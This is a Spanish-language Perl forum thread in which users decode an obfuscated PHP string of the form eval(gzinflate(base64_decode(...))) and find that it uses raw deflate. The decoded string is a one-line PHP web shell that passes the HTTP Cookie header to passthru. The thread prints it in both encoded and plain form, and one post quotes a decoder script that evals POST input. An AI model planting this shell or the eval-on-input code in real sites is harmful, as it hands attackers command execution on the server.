Using php Syntax Highlighting
<? eval(gzinflate(base64_decode('s7ezsS/IKFCodihILC4uySgq1UhPLUnNK9NQ8ggJCYh39vf39nRV0tS0rlWwB6oFAA=='))); ?>
Coloreado en 0.019 segundos, usando GeSHi 1.0.8.4
-
- Publicidad
Gzip y Base64
18 mensajes
• Página 2 de 2 • 1, 2
Publicidad
por explorer » 2008-01-03 11:16 @511
Mira este programa:
No sé si habrás puesto bien la cadena codificada, pero a mi no me sale nada de nada. En cambio funciona bien la primera prueba.
Using perl Syntax Highlighting
#!/usr/bin/perl
use Compress::Zlib;
use MIME::Base64;
my $mensaje_original = 'Hola. ¿Qué tal estás?';
my $code = encode_base64(Compress::Zlib::memGzip($mensaje_original),'');
print "$code\n"; # imprime H4sIAAAAAAAA//PIz0nUUzi0P7D08EqFksQchdTiksMLi+0BvCTjCBgAAAA=
print Compress::Zlib::memGunzip(decode_base64($code)), "\n";
# prueba
$code = 's7ezsS/IKFCodihILC4uySgq1UhPLUnNK9NQ8ggJCYh39vf39nRV0tS0rlWwB6oFAA==';
print Compress::Zlib::memGunzip(decode_base64($code)), "\n";
use Compress::Zlib;
use MIME::Base64;
my $mensaje_original = 'Hola. ¿Qué tal estás?';
my $code = encode_base64(Compress::Zlib::memGzip($mensaje_original),'');
print "$code\n"; # imprime H4sIAAAAAAAA//PIz0nUUzi0P7D08EqFksQchdTiksMLi+0BvCTjCBgAAAA=
print Compress::Zlib::memGunzip(decode_base64($code)), "\n";
# prueba
$code = 's7ezsS/IKFCodihILC4uySgq1UhPLUnNK9NQ8ggJCYh39vf39nRV0tS0rlWwB6oFAA==';
print Compress::Zlib::memGunzip(decode_base64($code)), "\n";
Coloreado en 0.002 segundos, usando GeSHi 1.0.8.4
No sé si habrás puesto bien la cadena codificada, pero a mi no me sale nada de nada. En cambio funciona bien la primera prueba.
JF^D Perl programming & Raku programming. Grupo en Telegram: https://t.me/Perl_ES
-
explorer - Administrador
- Mensajes: 14480
- Registrado: 2005-07-24 18:12 @800
- Ubicación: Valladolid, España
por Zeokat » 2008-01-03 12:48 @575
La cadena está bien 100% seguro... de hecho lo comprobé, encontré por ahí un script pero en PHP:
Y si hago el decode a mi code me da el siguiente código PHP:
Pero si con ese mismo script trato de hacer el decode al code de tu prueba me da error... no sé... pero me da a mi que solo puede con php
Using php Syntax Highlighting
<html>
<head>
<title>PHP Tool & Code to Decode - eval gzinflate base64_decode</title>
</head>
<body><h1>eval gzinflate base64_decode Decoder PHP Code</h1>
<form id="form1" name="form1" method="post" action="decrypt.php">
<textarea name="coded" cols="60" rows="8" id="coded"></textarea>
<input type="submit" name="Submit" value="Decode" />
</form>
<?php
$contents=stripslashes($_POST["coded"]);
if(trim($contents)!="")
{
while (preg_match("/eval\(gzinflate/",$contents))
{
$contents=preg_replace("/<\?|\?>/", "", $contents);
eval(preg_replace("/eval/", "\$contents=", $contents));
}
?>
<BR/>
<textarea name="decoded" cols="60" rows="8" id="decoded"><? echo $contents?></textarea>\
<?
}
?>
</body>
</html>
<head>
<title>PHP Tool & Code to Decode - eval gzinflate base64_decode</title>
</head>
<body><h1>eval gzinflate base64_decode Decoder PHP Code</h1>
<form id="form1" name="form1" method="post" action="decrypt.php">
<textarea name="coded" cols="60" rows="8" id="coded"></textarea>
<input type="submit" name="Submit" value="Decode" />
</form>
<?php
$contents=stripslashes($_POST["coded"]);
if(trim($contents)!="")
{
while (preg_match("/eval\(gzinflate/",$contents))
{
$contents=preg_replace("/<\?|\?>/", "", $contents);
eval(preg_replace("/eval/", "\$contents=", $contents));
}
?>
<BR/>
<textarea name="decoded" cols="60" rows="8" id="decoded"><? echo $contents?></textarea>\
<?
}
?>
</body>
</html>
Coloreado en 0.010 segundos, usando GeSHi 1.0.8.4
Y si hago el decode a mi code me da el siguiente código PHP:
Using php Syntax Highlighting
Pero si con ese mismo script trato de hacer el decode al code de tu prueba me da error... no sé... pero me da a mi que solo puede con php
- Zeokat
- Perlero nuevo
- Mensajes: 125
- Registrado: 2006-08-22 08:08 @380
por explorer » 2008-01-03 14:23 @641
Esto es lo que pasa...
Según uno de los mensajes de los usuarios de la página gzdeflate en php.net, hay distintas funciones para la descomprensión:
Es decir, si estás usando en PHP la función gzinflate() quiere decir que estás usando el modo *raw* de compresión.
Por lo tanto, no podemos usar Compress::Zlib, sino Compress::Raw::Zlib.
Bien, usando ese nuevo módulo, obtengo una salida de unos 50 bytes que es muy parecida a la que obtengo a partir del code original... pero... pero... a la hora de hacer el deflate, no sale nada...
Me dice que ese stream tiene un error.
Si saco lo decodificado por el base64, sale esto:
que es muy parecido a lo generado por el code original:
pero no... a la hora de intentar descomprimir ese flujo, falla.
Así que eso es lo que pasa: que hasta el último momento no hemos sabido que ese stream de bytes NO era un fichero gzip, sino un flujo (stream) crudo (raw) de zlib. Cosas muy distintas.
Si ejecuto este programa:
me sale
Según uno de los mensajes de los usuarios de la página gzdeflate en php.net, hay distintas funciones para la descomprensión:
- Código: Seleccionar todo
gzencode() == gzip
gzcompress() == zlib (aka. HTTP deflate)
gzdeflate() == *raw* deflate encoding
Es decir, si estás usando en PHP la función gzinflate() quiere decir que estás usando el modo *raw* de compresión.
Por lo tanto, no podemos usar Compress::Zlib, sino Compress::Raw::Zlib.
Bien, usando ese nuevo módulo, obtengo una salida de unos 50 bytes que es muy parecida a la que obtengo a partir del code original... pero... pero... a la hora de hacer el deflate, no sale nada...
Me dice que ese stream tiene un error.
Si saco lo decodificado por el base64, sale esto:
- Código: Seleccionar todo
explorer@dhcppc69:~/Documents/Desarrollo> hexdump -C kk2.gz
00000000 b3 b7 b3 b1 2f c8 28 50 a8 76 28 48 2c 2e 2e c9 |..../.(P.v(H,...|
00000010 28 2a d5 48 4f 2d 49 cd 2b d3 50 f2 08 09 09 88 |(*.HO-I.+.P.....|
00000020 77 f6 f7 f7 f6 74 55 d2 d4 b4 ae 55 b0 07 aa 05 |w....tU....U....|
00000030 00 |.|
00000031
que es muy parecido a lo generado por el code original:
- Código: Seleccionar todo
explorer@dhcppc69:~/Documents/Desarrollo> hexdump -C kk.gz
00000000 b3 b1 2f c8 28 50 a8 76 28 48 2c 2e 2e c9 28 2a |../.(P.v(H,...(*|
00000010 d5 48 4f 2d 49 cd 2b d3 50 f2 08 09 09 88 77 f6 |.HO-I.+.P.....w.|
00000020 f7 f7 f6 74 55 d2 d4 b4 ae 55 b0 b7 03 00 59 be |...tU....U....Y.|
00000030 0e 36 |.6|
00000032
pero no... a la hora de intentar descomprimir ese flujo, falla.
Así que eso es lo que pasa: que hasta el último momento no hemos sabido que ese stream de bytes NO era un fichero gzip, sino un flujo (stream) crudo (raw) de zlib. Cosas muy distintas.
Si ejecuto este programa:
Using perl Syntax Highlighting
#!/usr/bin/perl
use MIME::Base64;
use Compress::Raw::Zlib;
$input = '<?php {@passthru(getenv("HTTP_COOKIE"));} ?>';
$x = new Compress::Raw::Zlib::Deflate;
$status = $x->deflate($input, $output);
$status = $x->flush($output);
print encode_base64($output);
use MIME::Base64;
use Compress::Raw::Zlib;
$input = '<?php {@passthru(getenv("HTTP_COOKIE"));} ?>';
$x = new Compress::Raw::Zlib::Deflate;
$status = $x->deflate($input, $output);
$status = $x->flush($output);
print encode_base64($output);
Coloreado en 0.001 segundos, usando GeSHi 1.0.8.4
- Código: Seleccionar todo
s7EvyChQqHYoSCwuLskoKtVITy1JzSvTUPIICQmId/b39/Z0VdLUtK5VsLcDAFm+DjY=
JF^D Perl programming & Raku programming. Grupo en Telegram: https://t.me/Perl_ES
-
explorer - Administrador
- Mensajes: 14480
- Registrado: 2005-07-24 18:12 @800
- Ubicación: Valladolid, España
por creating021 » 2008-01-03 16:14 @718
Zeokat escribiste:Entiendo q lo mejor es hacer en php:Using php Syntax Highlighting<? echo(gzinflate(base64_decode('s7ezsS/IKFCodihILC4uySgq1UhPLUnNK9NQ8ggJCYh39vf39nRV0tS0rlWwB6oFAA=='))); ?>Coloreado en 0.009 segundos, usando GeSHi 1.0.8.4
Y ala ahi lo tenemos ya decode.
No hombre, lo que pasa es que se está usando los módulos que no son:
Using perl Syntax Highlighting
use strict;
use MIME::Base64;
use IO::Uncompress::AnyInflate qw(anyinflate);
my $code = 's7ezsS/IKFCodihILC4uySgq1UhPLUnNK9NQ8ggJCYh39vf39nRV0tS0rlWwB6oFAA==';
my $input = decode_base64( $code );
my $output;
my $status = anyinflate \$input => \$output;
print $output, "\n";
use MIME::Base64;
use IO::Uncompress::AnyInflate qw(anyinflate);
my $code = 's7ezsS/IKFCodihILC4uySgq1UhPLUnNK9NQ8ggJCYh39vf39nRV0tS0rlWwB6oFAA==';
my $input = decode_base64( $code );
my $output;
my $status = anyinflate \$input => \$output;
print $output, "\n";
Coloreado en 0.001 segundos, usando GeSHi 1.0.8.4
Expect the worst, is it the least you can do?
-
creating021 - Perlero frecuente
- Mensajes: 595
- Registrado: 2006-02-23 16:17 @720
- Ubicación: Frente al monitor
Conseguido!
por explorer » 2008-01-03 18:27 @810
creating021 se me ha adelantado en la publicación de la solución, pero he aquí la mía, basada en Compress::Raw::Zlib (es decir, con menos dependencias que con IO::Uncompress::AnyInflate).
Aunque, desde luego, el uso de IO::Uncompress::AnyInflate es mejor porque es él el que decide el formato de lo que se quiere decodificar. Depende de más módulos, pero te permite hacer más cosas y más formas.
Using perl Syntax Highlighting
#!/usr/bin/perl
use MIME::Base64;
use Compress::Raw::Zlib;
$code = 's7ezsS/IKFCodihILC4uySgq1UhPLUnNK9NQ8ggJCYh39vf39nRV0tS0rlWwB6oFAA==';
$i = Compress::Raw::Zlib::Inflate->new( {-Bufsize => 1, -WindowBits => -&MAX_WBITS} );
$input = decode_base64($code);
$status = $i->inflate($input, $output);
print "$output\n"; # imprime '?><?php {@passthru(getenv("HTTP_COOKIE"));} ?><?'
use MIME::Base64;
use Compress::Raw::Zlib;
$code = 's7ezsS/IKFCodihILC4uySgq1UhPLUnNK9NQ8ggJCYh39vf39nRV0tS0rlWwB6oFAA==';
$i = Compress::Raw::Zlib::Inflate->new( {-Bufsize => 1, -WindowBits => -&MAX_WBITS} );
$input = decode_base64($code);
$status = $i->inflate($input, $output);
print "$output\n"; # imprime '?><?php {@passthru(getenv("HTTP_COOKIE"));} ?><?'
Coloreado en 0.001 segundos, usando GeSHi 1.0.8.4
Aunque, desde luego, el uso de IO::Uncompress::AnyInflate es mejor porque es él el que decide el formato de lo que se quiere decodificar. Depende de más módulos, pero te permite hacer más cosas y más formas.
JF^D Perl programming & Raku programming. Grupo en Telegram: https://t.me/Perl_ES
-
explorer - Administrador
- Mensajes: 14480
- Registrado: 2005-07-24 18:12 @800
- Ubicación: Valladolid, España
18 mensajes
• Página 2 de 2 • 1, 2
¿Quién está conectado?
Usuarios navegando por este Foro: No hay usuarios registrados visitando el Foro y 8 invitados